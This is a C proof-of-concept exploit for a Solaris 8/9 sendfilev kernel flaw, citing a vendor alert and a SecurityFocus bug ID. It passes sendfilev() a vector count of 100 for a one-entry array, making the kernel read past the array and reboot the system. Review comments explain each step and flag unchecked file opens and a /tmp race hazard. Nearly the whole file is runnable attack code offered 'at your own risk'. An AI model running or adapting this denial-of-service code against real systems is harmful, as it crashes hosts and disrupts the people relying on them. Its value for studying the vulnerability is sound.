/*
 * Solaris 8/9 sendfilev PoC exploit code.
 *
 * Causes a DoS and the system will reboot.
 *
 * I'm not sure this is just a DoS, because honestly
 * it smells somewhat like a buffer overflow.  If
 * anyone figures out more, email me.
 *
 * Jon Hart <warchild@spoofed.org>
 *
 *   $CC -o solaris-sendfilev-exploit solaris-sendfilev-exploit.c -lsendfile
 *
 *   See:
 *
 *      http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/57470
 *      http://securityfocus.com/bid/10202/
 *
 * I take no responsibility whatsoever for what you do
 * with this code.  Use at your own risk.
 */

#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main (int argc, char *argv[]) {
   /*
    * Entry point.  argc and argv are unused; the program takes no options.
    *
    * Opens a scratch file as the sendfilev() destination, fills in a single
    * sendfilevec entry referring to /etc/hosts, then calls sendfilev() with a
    * vector count (100) that exceeds the one-entry array.  What happens next
    * is decided by the kernel, not by this program; the vendor alert and BID
    * referenced in the file header describe the affected releases and the fix.
    */
   ssize_t ret;                 /* sendfilev() result; assigned but never examined */
   size_t xfer;                 /* bytes-transferred out-parameter written by sendfilev() */
   struct sendfilevec vec[1];   /* the only entry that actually exists */
   /* NOTE(review): neither open() result is checked, so on failure fd (or
    * sfv_fd) is -1 and sendfilev() is still called.  O_CREAT without O_EXCL on
    * a fixed path under /tmp is also a symlink-race hazard for this program. */
   int fd = open("/tmp/.sendfile", O_RDWR | O_CREAT | O_TRUNC, 0600);
   vec[0].sfv_fd = open("/etc/hosts", O_RDONLY);
   vec[0].sfv_flag = 0;
   vec[0].sfv_off = 0;
   vec[0].sfv_len = 0;          /* no bytes requested from the one valid entry */

   /* This is where the DoS happens.  The count points way too far into the
    * vector, which only has 1 entry in it, so the kernel reads past the array.
    */
   ret = sendfilev(fd, vec, 100, &xfer);
   /* NOTE(review): no return statement, ret is discarded, and neither
    * descriptor is closed; the process simply exits here. */
}
